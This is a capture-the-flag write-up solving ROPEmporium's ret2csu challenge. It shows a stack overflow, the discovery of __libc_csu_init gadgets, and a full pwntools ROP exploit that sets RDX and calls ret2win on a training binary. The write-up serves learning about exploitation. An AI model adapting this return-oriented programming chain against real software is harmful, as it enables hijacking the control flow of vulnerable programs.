In this post, I will be explaining my solution for the Ret2CSU challenge from ROPEmporium. The challenge can be found here: https://ropemporium.com/challenge/ret2csu.html

ROPEmporium challenges are awesome for learning Return Oriented Programming (ROP) with small and fairly easy-to-analyse binaries. Ret2CSU is the 8th and (currently) final stage of ROPEmporium and involves a binary with no custom ROP gadgets added to it. You have to work with the "attached code" added to the binary by the compiler, and your goal is to execute the ret2win function.

Here are some tools I recommend for these types of binary challenges:

  • GDB with the PEDA extension (for debugging)
  • objdump (for dissassembling and finding symbol addresses)
  • readelf (for looking at the ELF header and symbols)
  • pwntools python library (for creating exploits)
  • ROPgadget (for finding ROP gadgets available in the binary)

In the challenge, we are provided a flag.txt file and the executable to compromise (named ret2csu). Let's run file on it to make sure it's what we expect:

# file ret2csu 
ret2csu: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a799b370a24ba0109f1175f31b3058094b5feab5, not stripped

OK cool! So it's a 64 bit ELF executable with dynamically linked libraries. The symbols also haven't been stripped, which is nice :)

Next we can execute it in a sandbox environment and see what happens:

# ./ret2csu 
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> 

The executable just prints out some text and asks us to call ret2win, making sure the third argument to it (which is in rdx) is equal to 0xdeadcafebabebeef.

Note that there's a great reference for 64-bit syscalls here: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/. This site shows that parameters to parsed in using the following registers: RDI, then RSI, then RDX.

Let's also run checksec on the binary (provided with GDB PEDA) to see what protections it has:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Above we can see that NX is enabled (hence we have to use ROP), CANARY is disabled (so we don't have to bypass a stack canary), and PIE is disabled (so we know the addresses of the binary itself are predictable). Next, as we know this is a buffer overflow challenge, we can run the binary with GDB and provide a large value as the input to see what happens:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ pattern create 500
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$ r
Starting program: /root/Documents/hackthebox/ropemporium/ret2csu/ret2csu 
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A

I created a unique pattern with pattern create and then sent it to the program. The program crashes straight away and GDB PEDA shows me the following output:

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x601038 --> 0x0 
RBX: 0x0 
RCX: 0xfbad2288 
RDX: 0x7fffffffe0d0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
RSI: 0x7ffff7f998d0 --> 0x0 
RDI: 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe0f8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
RIP: 0x4007b0 (:	ret)
R8 : 0x0 
R9 : 0x7ffff7f9e500 (0x00007ffff7f9e500)
R10: 0x602010 --> 0x0 
R11: 0x246 
R12: 0x4005f0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe1e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4007a7 :	mov    rdi,0x0
   0x4007ae :	nop
   0x4007af :	leave  
=> 0x4007b0 :	ret    
   0x4007b1 :	push   rbp
   0x4007b2 :	mov    rbp,rsp
   0x4007b5 :	sub    rsp,0x30
   0x4007b9 :	mov    DWORD PTR [rbp-0x24],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe0f8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0008| 0x7fffffffe100 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0016| 0x7fffffffe108 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0024| 0x7fffffffe110 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0032| 0x7fffffffe118 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0040| 0x7fffffffe120 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0048| 0x7fffffffe128 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
0056| 0x7fffffffe130 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAW")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004007b0 in pwnme ()

The crash is when the program is trying to run ret, which pops the first 64 bits off the stack and jumps to that location. As the top of the stack is pointing to our unique pattern, the program is unable to jump to it as a location and crashes with a segfault. So let's find the offset of the top of the stack:

gdb-peda$ pattern offset AA0AAFAAbAA
AA0AAFAAbAA found at offset: 40

Great! Now we can create a sample python exploit and test whether we can control the flow of the application at this offset. Below, I use pwntools to create a template for my exploit code:

# pwn template ret2csu > exploit.py

The above line creates an executable python script with some nice template code, with features such as:

  • creating a pwntools process object to allow us to interact with the process
  • parsing arguments to enable or disable remote GDB debugging
  • automatically executes checksec on the binary and puts it in a comment in our exploit

Now to get to our actual ROP chain! Let's find the addresses of the symbols and gadgets we need! First, we need the address of the ret2win function. We can use objdump to help us with this:

# objdump -D ret2csu -M intel | grep ret2win
00000000004007b1 < ret2win>:

Note that I disassembled all sections in the binary using -D and asked for the output to be in intel syntax using -M intel. Next, we can use ROPgadget to find gadgets. We know that we want to control the value in RDX, so we can look for any instructions with pop or rdx in them:

# ROPgadget --binary ret2csu | grep pop
<---------snipped output--------->
0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# ROPgadget --binary ret2csu | grep rdx
0x0000000000400567 : lea ecx, dword ptr [rdx] ; and byte ptr [rax], al ; test rax, rax ; je 0x40057b ; call rax
0x000000000040056d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret

We have a really nice gadget for controlling the registers R12,R13,R14,R15, however we don't have any nice registers for controlling what goes into rdx.

Using objdump -D ret2csu -M intel we find that the above pop gadget is actually in the <__libc_csu_init> section of the codebase, and has a few more pop instructions before it:

  40089a:	5b                   	pop    rbx
  40089b:	5d                   	pop    rbp
  40089c:	41 5c                	pop    r12
  40089e:	41 5d                	pop    r13
  4008a0:	41 5e                	pop    r14
  4008a2:	41 5f                	pop    r15
  4008a4:	c3                   	ret

This must be the section the challenge title is referring to! So we look for other code in this section which we may be able to use to control RDX, and we find the following interesting code:

  400880:	4c 89 fa             	mov    rdx,r15
  400883:	4c 89 f6             	mov    rsi,r14
  400886:	44 89 ef             	mov    edi,r13d
  400889:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]

The above gadget, also found in the CSU section, uses the registers we control ( r12,r13,r14,r15 ) in mov instructions and a call instruction. This is great! We can treat the call like a jmp instruction as long as we control the contents of r12 and rbx, where the address jumped to is calculated as follows: ptr ( r12 + rbx * 8)

As part of the first mov instruction, we see that the value in r15 is copied into rdx. This means we can use our first gadget to pop a value of our choice into r15 and then use the second gadget to copy this value into rdx!

OK we're getting somewhere. Let's set up our initial payload to set RDX to the value we want and set all other registers to 0x00:

io = start()

# mov r15 -> rdx, mov r14 -> rsi, mov r13d -> edi, call ptr(r12 + rbx*8)
movAndCall = p64(0x400880)
# pop in the following order: rbx, rbp, r12, r13, r14, r15
popAllRegisters = p64(0x40089a)
ret2win = p64(0x04007b1)
valueForRdx = p64(0xdeadcafebabebeef)

initial = "A"*40
payload = initial + popAllRegisters + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + valueForRdx + movAndCall

io.send(payload)
open('output','w').write(payload)

io.interactive()

As we have set r12 and rbx to 0x00, we expect the program to crash when it tries to execute call [0x00]. To help test my payload, I've also added the second last line to output my payload to a file. I can then easily pass my payload to the application from within GDB. After running ./exploit.py, I have a file named output in my folder, and I run the application in GDB as follows:

# gdb ret2csu -q
Reading symbols from ret2csu...(no debugging symbols found)...done.
gdb-peda$ r < output
Starting program: ret2csu < output
ret2csu by ROP Emporium
Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

>
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x601038 --> 0x0
RBX: 0x0RCX: 0xfbad2098
RDX: 0xdeadcafebabebeef
RSI: 0x0RDI: 0x0RBP: 0x0
RSP: 0x7fffffffe138 --> 0x5d2334019ad6ff00
RIP: 0x400889 (<__libc_csu_init+73>:	call   QWORD PTR [r12+rbx8])
R8 : 0x0
R9 : 0x77 ('w')
R10: 0x602010 --> 0x0
R11: 0x246R12: 0x0
R13: 0x0
R14: 0x0
R15: 0xdeadcafebabebeef
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400880 <__libc_csu_init+64>:	mov    rdx,r15
0x400883 <__libc_csu_init+67>:	mov    rsi,r14
0x400886 <__libc_csu_init+70>:	mov    edi,r13d
=> 0x400889 <__libc_csu_init+73>:	call   QWORD PTR [r12+rbx8]
0x40088d <__libc_csu_init+77>:	add    rbx,0x1
0x400891 <__libc_csu_init+81>:	cmp    rbp,rbx
0x400894 <__libc_csu_init+84>:	jne    0x400880 <__libc_csu_init+64>
0x400896 <__libc_csu_init+86>:	add    rsp,0x8
Guessed arguments:
arg[0]: 0x0
arg[1]: 0x0
arg[2]: 0xdeadcafebabebeef
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe138 --> 0x5d2334019ad6ff00
0008| 0x7fffffffe140 --> 0x4005f0 (<_start>:	xor    ebp,ebp)
0016| 0x7fffffffe148 --> 0x7fffffffe1e0 --> 0x1
0024| 0x7fffffffe150 --> 0x0
0032| 0x7fffffffe158 --> 0x0
0040| 0x7fffffffe160 --> 0xa2dccb7e4876ffdc
0048| 0x7fffffffe168 --> 0xa2dcdb418af0ffdc
0056| 0x7fffffffe170 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400889 in __libc_csu_init ()

OK great! We have a successful crash as predicted at 0x400889! We can also see that the values of our registers r12 and rbx are set to 0x0.

Here is the tricky bit of this challenge. I mistakingly tried putting the address of ret2win in r12 and keeping 0x0 in rbx, assuming that the call would jump to ret2win, but this was an incorrect assumption as the call instruction actually dereferences the calculated value first and then jumps to what it points to.

Being stuck here for a bit, I thought about placing the address of ret2win on the stack and the address of the stack in r12, which should dereference correctly, but didn't find any useful gadget for doing this. The alternative is to find a location in the binary which points to another location in the codebase, and continue execution from there.

Disassembling all sections again and looking through for pointers to code (which i know has addresses after 0x400000 ), I find some interesting parts added by the compiler again:

Disassembly of section .init_array:

0000000000600e10 <__frame_dummy_init_array_entry>:
  600e10:	d0 06                	rol    BYTE PTR [rsi],1
  600e12:	40 00 00             	add    BYTE PTR [rax],al
  600e15:	00 00                	add    BYTE PTR [rax],al
	...

Disassembly of section .fini_array:

0000000000600e18 <__do_global_dtors_aux_fini_array_entry>:
  600e18:	a0                   	.byte 0xa0
  600e19:	06                   	(bad)  
  600e1a:	40 00 00             	add    BYTE PTR [rax],al
  600e1d:	00 00                	add    BYTE PTR [rax],al

Looks like at 0x600e10 I have the address 0x4006d0 and at 0x600e18 I have the address 0x4006a0. So if I set r12 to either of these pointers, I should be able get to these addresses. Let's have a look at the code at these addresses:

00000000004006a0 <__do_global_dtors_aux>:
  4006a0:	80 3d d1 09 20 00 00 	cmp    BYTE PTR [rip+0x2009d1],0x0        # 601078 <completed.7696>
  4006a7:	75 17                	jne    4006c0 <__do_global_dtors_aux+0x20>
  4006a9:	55                   	push   rbp
  4006aa:	48 89 e5             	mov    rbp,rsp
  4006ad:	e8 7e ff ff ff       	call   400630 <deregister_tm_clones>
  4006b2:	c6 05 bf 09 20 00 01 	mov    BYTE PTR [rip+0x2009bf],0x1        # 601078 <completed.7696>
  4006b9:	5d                   	pop    rbp
  4006ba:	c3                   	ret    
  4006bb:	0f 1f 44 00 00       	nop    DWORD PTR [rax+rax*1+0x0]
  4006c0:	f3 c3                	repz ret 
  4006c2:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
  4006c6:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
  4006cd:	00 00 00 

00000000004006d0 <frame_dummy>:
  4006d0:	55                   	push   rbp
  4006d1:	48 89 e5             	mov    rbp,rsp
  4006d4:	5d                   	pop    rbp
  4006d5:	eb 89                	jmp    400660 <register_tm_clones>

They are more functions placed into the binary by the compiler! So, if we take them as functions in their own right, we may be able to assume that they end in a ret which should return us back into <__libc_csu_init> right after our call. The call instruction will automatically put the next instruction onto the stack, so if any of these functions ends in a ret, we will continue execution within <__libc_csu_init>.

So as long as this works, the following code should be executed after our call:

  400889:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]
  40088d:	48 83 c3 01          	add    rbx,0x1
  400891:	48 39 dd             	cmp    rbp,rbx
  400894:	75 ea                	jne    400880 <__libc_csu_init+0x40>
  400896:	48 83 c4 08          	add    rsp,0x8
  40089a:	5b                   	pop    rbx
  40089b:	5d                   	pop    rbp
  40089c:	41 5c                	pop    r12
  40089e:	41 5d                	pop    r13
  4008a0:	41 5e                	pop    r14
  4008a2:	41 5f                	pop    r15
  4008a4:	c3                   	ret    

It looks like after our call, we execute a compare instruction, and then as long as that sets the zero flag, we continue execution to our first gadget. This is very convenient that we get back to our first gadget because it ends with a ret, allowing us to finally pass control to ret2win after having set RDX to the value we wanted.

Now all we need to do is make sure the cmp instruction compares two equal values. It looks like 0x01 is added to rbx and then compared to rbp. Since we control both these registers from our first gadget, we can just set these to 0x00 and 0x01 respectively and continue execution past the jne instruction.

So our final payload becomes:

io = start()

# mov r15 -> rdx, mov r14 -> rsi, mov r13d -> edi, call ptr(r12 + rbx*8)
movAndCall = p64(0x400880)
# pop in the following order: rbx, rbp, r12, r13, r14, r15
popAllRegisters = p64(0x40089a)
ret2win = p64(0x04007b1)
valueForRdx = p64(0xdeadcafebabebeef)
valueForR12 = p64(0x600e18)

initial = "A"*40
payload = initial + popAllRegisters + p64(0) + p64(1) + valueForR12 + p64(0) + p64(0) + valueForRdx + movAndCall
payload += p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + ret2win

io.send(payload)
open('output','w').write(payload)

io.interactive()

Our payload includes the initial 40 bytes of junk, followed by the call to our first gadget for popping 6 registers. We set rbx to 0x00, rbp to 0x01, r12 to one of the pointers we found, r13 and r14 to whatever, and r15 to the special challenge value. Then the second gadget gets called ( movandCall ), and we continue execution past the call to add rsp, 0x08 followed by 6 pop's and a ret. So we place 7 64 bit values on the stack and ret to our ret2win address :)

./exploit.py
[] 'ret2csu'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
[+] Starting local process 'ret2csu': pid 10496
[] Switching to interactive mode
$
ROPE{a_placeholder_32byte_flag!}

And that's our flag!

Many thanks to the challenge creator for helping me learn!